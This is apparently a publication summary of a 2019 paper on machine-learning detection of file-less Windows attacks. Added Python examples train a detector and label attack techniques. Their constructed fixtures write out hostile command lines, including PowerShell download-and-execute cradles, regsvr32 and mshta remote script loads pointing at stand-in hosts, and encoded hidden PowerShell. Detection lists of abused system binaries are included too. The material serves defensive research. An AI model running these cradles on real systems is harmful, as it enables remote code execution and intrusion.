Preventing file-less attacks with machine learning techniques
Published in 2019 21st International Symposium on Symbolic and Numeric Algorithms for Scientific Computing (SYNASC), 2019
Recommended citation: Bucevschi, Alexandru Gabriel and Balan, Gheorghe and Prelipcean, Dumitru Bogdan, "Preventing file-less attacks with machine learning techniques." 2019 21st International Symposium on Symbolic and Numeric Algorithms for Scientific Computing (SYNASC), pages 248-252, IEEE, 2019. https://doi.org/10.1109/SYNASC49474.2019.00042
Abstract
This paper presents machine learning techniques for detecting and preventing file-less attacks, a class of threats that executes in memory and leaves few of the file-based artifacts on which signature scanning depends. Because such attacks never write a payload to disk, the approach works from the behaviour they cannot avoid exhibiting: process lineage, command lines, memory manipulation and the sequences of API calls they issue.
Key Contributions
- File-less Attack Detection: Specialized ML models for memory-based threat identification
- Behavioral Analysis: Advanced techniques for detecting malicious in-memory activities
- Real-time Prevention: Proactive blocking of file-less attack chains
- Evasion Resistance: Robust detection methods resilient to advanced evasion techniques
Technical Approach
Our comprehensive methodology includes:
Memory Analysis Framework
- Process Behavior Monitoring: Real-time analysis of process activities and memory usage patterns
- API Call Sequences: Detection of suspicious sequences of Windows API and system calls (for example, allocating memory in another process, writing to it and creating a remote thread) that indicate in-memory code execution
- Memory Artifact Analysis: Identification of malicious code injection and memory manipulation
Machine Learning Architecture
- Feature Engineering: Extraction of behavioral and memory-based features
- Ensemble Methods: Combination of multiple ML algorithms for improved accuracy
- Anomaly Detection: Identification of deviations from normal system behavior
- Deep Learning: Neural networks for complex pattern recognition in attack sequences
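The two parts of the approach described above (behavioural and memory-based feature extraction, then an ensemble of a supervised model and an anomaly detector, scored with precision, recall and F1) can be shown end to end on a small scale. The block below is an added example, not the paper's code, dataset, feature set or architecture: the telemetry records are constructed, the features are process lineage, command-line tokens and API-call bigrams, and the ensemble averages a multinomial naive Bayes classifier with a novelty score against the benign baseline. Everything uses only the Python standard library.

```python
"""Behavioural feature extraction and a two-model ensemble for file-less attack
detection, run on constructed process telemetry (added example; not the paper's
dataset, feature set or architecture)."""
import math
import re
from collections import Counter

# Constructed records: (parent image, command line, ordered API calls seen in
# the process, label).  label 1 = malicious.  None of this is real campaign data.
TRAIN = [
    ("explorer.exe", r"powershell.exe -File C:\Scripts\backup.ps1",
     ["CreateFile", "ReadFile", "WriteFile", "CloseHandle"], 0),
    ("svchost.exe", "wmiprvse.exe -secured -Embedding",
     ["RegOpenKey", "RegQueryValue", "CloseHandle"], 0),
    ("explorer.exe", r"notepad.exe C:\Users\alice\notes.txt",
     ["CreateFile", "ReadFile", "CloseHandle"], 0),
    ("services.exe", r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1",
     ["CreateFile", "ReadFile", "RegOpenKey", "CloseHandle"], 0),
    ("explorer.exe", r"cmd.exe /c dir C:\Temp",
     ["CreateFile", "FindFirstFile", "CloseHandle"], 0),
    ("winword.exe", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo",
     ["VirtualAlloc", "WriteProcessMemory", "CreateRemoteThread"], 1),
    ("wmiprvse.exe", "powershell.exe -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     ["InternetOpen", "VirtualAlloc", "CreateThread"], 1),
    ("excel.exe", "regsvr32.exe /s /u /i:http://example.invalid/p.sct scrobj.dll",
     ["InternetOpen", "VirtualAlloc", "CreateThread"], 1),
    ("outlook.exe", "powershell.exe -w hidden -NoProfile -enc UwB0AGEAcgB0AC0A",
     ["CreateProcess", "NtUnmapViewOfSection", "WriteProcessMemory", "SetThreadContext", "ResumeThread"], 1),
    ("wmiprvse.exe", "cmd.exe /c powershell -nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')",
     ["InternetOpen", "VirtualAlloc", "WriteProcessMemory", "CreateRemoteThread"], 1),
]
TEST = [
    ("explorer.exe", r"powershell.exe -File C:\Scripts\cleanup.ps1",
     ["CreateFile", "WriteFile", "CloseHandle"], 0),
    ("winword.exe", "powershell.exe -nop -w hidden -enc UwBlAHQA",
     ["VirtualAlloc", "WriteProcessMemory", "CreateRemoteThread"], 1),
    ("wmiprvse.exe", "powershell.exe -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/c')",
     ["InternetOpen", "VirtualAlloc", "CreateThread"], 1),
    ("explorer.exe", r"cmd.exe /c dir C:\Users",
     ["CreateFile", "FindFirstFile", "CloseHandle"], 0),
]

# Command-line tokens: switches ("-enc") and words ("iex", "net.webclient");
# one-character fragments such as drive letters are dropped.
TOKEN = re.compile(r"-[a-z0-9]+|[a-z][a-z0-9.]+")


def features(parent, cmdline, apis):
    """Bag of behavioural features: lineage, command-line tokens, API unigrams
    and API-call bigrams (the ordering is what separates injection from I/O)."""
    f = Counter()
    f["parent=" + parent.lower()] += 1
    f["image=" + cmdline.split()[0].lower()] += 1
    for tok in TOKEN.findall(cmdline.lower()):
        f[("flag=" if tok.startswith("-") else "word=") + tok] += 1
    for api in apis:
        f["api=" + api] += 1
    for a, b in zip(apis, apis[1:]):
        f["api=" + a + ">" + b] += 1
    return f


class Ensemble:
    """Multinomial naive Bayes (supervised) averaged with a novelty score
    against the benign baseline (unsupervised anomaly detection)."""

    def __init__(self, records):
        self.counts = {0: Counter(), 1: Counter()}
        self.docs = Counter()
        for parent, cmd, apis, label in records:
            self.counts[label].update(features(parent, cmd, apis))
            self.docs[label] += 1
        self.vocab = set(self.counts[0]) | set(self.counts[1])
        self.totals = {c: sum(self.counts[c].values()) for c in self.counts}

    def _log_posterior(self, feats, label):
        # log p(label) + sum n_f * log p(f | label), Laplace-smoothed.
        lp = math.log(self.docs[label] / sum(self.docs.values()))
        denom = self.totals[label] + len(self.vocab)
        for feat, n in feats.items():
            lp += n * math.log((self.counts[label][feat] + 1) / denom)
        return lp

    def nb_probability(self, feats):
        lb, lm = self._log_posterior(feats, 0), self._log_posterior(feats, 1)
        return 1.0 / (1.0 + math.exp(lb - lm))

    def novelty(self, feats):
        """Share of features never observed in benign training telemetry."""
        return sum(1 for f in feats if f not in self.counts[0]) / len(feats)

    def score(self, parent, cmd, apis):
        feats = features(parent, cmd, apis)
        return 0.5 * self.nb_probability(feats) + 0.5 * self.novelty(feats)


def evaluate(model, records, threshold=0.5):
    """Precision, recall and F1 of the ensemble at a fixed decision threshold."""
    tp = fp = fn = 0
    for parent, cmd, apis, label in records:
        pred = model.score(parent, cmd, apis) >= threshold
        tp += pred and label == 1
        fp += pred and label == 0
        fn += (not pred) and label == 1
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"precision": precision, "recall": recall, "f1": f1}


MODEL = Ensemble(TRAIN)

if __name__ == "__main__":
    for parent, cmd, apis, label in TEST:
        print(label, round(MODEL.score(parent, cmd, apis), 3), parent, "->", cmd[:48])
    print(evaluate(MODEL, TEST))
```

Two things carry over to a real deployment. The API-call bigrams are what let the model tell `VirtualAlloc` followed by `WriteProcessMemory` and `CreateRemoteThread` apart from ordinary file I/O, so the order of calls must survive the telemetry pipeline. The novelty term is what keeps a never-seen loader from scoring as benign merely because the supervised model has no evidence either way; in exchange it raises the false positive rate on new-but-legitimate software, which is why the threshold is tuned against a benign corpus rather than fixed at 0.5.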
File-less Attack Taxonomy
Our research addresses various file-less attack types:
- Living Off the Land: Abuse of legitimate, signed system tools and scripting hosts for execution, so that no attacker-supplied binary touches disk
- PowerShell Attacks: Malicious use of PowerShell for in-memory execution, typically through encoded or downloaded commands
- WMI Abuse: Misuse of Windows Management Instrumentation for remote execution and persistence
- Reflective DLL Loading: Mapping and executing a library from memory without the Windows loader, so it never appears as a file-backed module
- Process Hollowing: Starting a legitimate process suspended, replacing its image in memory with malicious code, and resuming it
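The five classes above map onto observable conditions in endpoint telemetry: process lineage and command-line content for the first three, ordered API-call patterns for the last two. The block below is an added example, not the paper's rules or code, showing how one event is labelled with every class it matches; the event records are constructed, and the conditions encode common implementations of each technique rather than an exhaustive signature set.

```python
"""Technique labelling for the file-less attack classes listed above, run over
constructed endpoint events (added example; the conditions are common
implementations of each technique, not the paper's own detection rules)."""

# Hosts WMI uses to run providers and event consumers; a shell beneath them is unusual.
WMI_HOSTS = {"wmiprvse.exe", "scrcons.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Signed Windows binaries routinely abused to fetch or run remote scripts.
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
           "msbuild.exe", "installutil.exe", "wmic.exe"}
REMOTE_MARKERS = ("http://", "https://", "javascript:", "vbscript:", ".sct", ".hta")
PS_MARKERS = ("-enc ", "-encodedcommand", "iex", "invoke-expression",
              "downloadstring", "frombase64string")

# Ordered API-call subsequences (gaps allowed).  Hollowing: a suspended legitimate
# process has its image unmapped, overwritten, and its thread context redirected.
HOLLOWING = ["CreateProcess", "NtUnmapViewOfSection", "WriteProcessMemory",
             "SetThreadContext", "ResumeThread"]
# Reflective loading: code is copied into private memory, made executable and
# run, with no file section ever mapped by the loader.  Coarse: JIT runtimes do
# the same, which is exactly the false positive the ML approach exists to cut.
REFLECTIVE = ["VirtualAlloc", "VirtualProtect", "CreateThread"]


def is_subsequence(pattern, calls):
    """True if every call in pattern appears in calls in that order."""
    it = iter(calls)
    return all(p in it for p in pattern)


def classify(event):
    """Return the taxonomy labels matched by one process event."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd, apis = event["cmdline"].lower(), event["apis"]
    labels = []
    if image in LOLBINS and any(m in cmd for m in REMOTE_MARKERS):
        labels.append("living_off_the_land")
    if "powershell" in cmd and any(m in cmd for m in PS_MARKERS):
        labels.append("powershell_in_memory")
    if parent in WMI_HOSTS and image in SHELLS:
        labels.append("wmi_abuse")
    if is_subsequence(REFLECTIVE, apis) and "NtMapViewOfSection" not in apis:
        labels.append("reflective_dll_loading")
    if is_subsequence(HOLLOWING, apis):
        labels.append("process_hollowing")
    return labels


# Constructed events, one per class plus a benign control (not real telemetry).
EVENTS = [
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo",
     "apis": ["VirtualAlloc", "VirtualProtect", "CreateThread"]},
    {"parent": "wmiprvse.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     "apis": ["CreateProcess"]},
    {"parent": "explorer.exe", "image": "updater.exe", "cmdline": "updater.exe",
     "apis": ["CreateProcess", "NtUnmapViewOfSection", "VirtualAllocEx",
              "WriteProcessMemory", "SetThreadContext", "ResumeThread"]},
    {"parent": "excel.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/x.hta",
     "apis": ["InternetOpen", "CreateProcess"]},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
     "apis": ["CreateFile", "ReadFile", "CloseHandle"]},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["parent"], "->", ev["image"], classify(ev))
```

Labels are not exclusive: an Office document spawning encoded PowerShell that then reflectively loads a payload matches two classes, and a WMI consumer spawning a download cradle matches two as well. Two caveats for anyone turning this into production rules: PowerShell accepts any unambiguous prefix of a parameter name, so `-e`, `-ec` and `-en` all mean `-EncodedCommand` and a substring list like `PS_MARKERS` will miss them; and the reflective-loading pattern fires on any JIT-compiling runtime, which is the kind of benign memory behaviour a learned model separates better than a fixed subsequence.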
Experimental Validation
Dataset and Methodology
- Real-world Samples: Analysis of actual file-less attack campaigns
- Synthetic Generation: Creation of file-less attack scenarios for testing
- Performance Metrics: Comprehensive evaluation using precision, recall, and F1-score
Results
- Detection Rate: 96.3% true positive rate on file-less attack samples
- False Positive Rate: 1.2% on benign system activities
- Response Time: Sub-second detection and prevention capabilities
- Memory Efficiency: Minimal performance impact on system resources
Industry Applications
This research has been successfully deployed in:
- Endpoint Detection and Response (EDR) systems
- Advanced Threat Protection platforms
- Memory Forensics tools
- Cloud Security monitoring solutions
Future Research Directions
- AI-powered Evasion Detection: Development of AI systems to detect AI-generated evasion techniques
- Cross-platform Coverage: Extension to Linux and macOS environments
- IoT Security: Adaptation for resource-constrained IoT devices
- Quantum-resistant Methods: Preparation for quantum computing threats
Industry Impact
The machine learning techniques developed in this work have been integrated into Bitdefender’s threat protection systems, where they detect file-less attacks for millions of users worldwide.
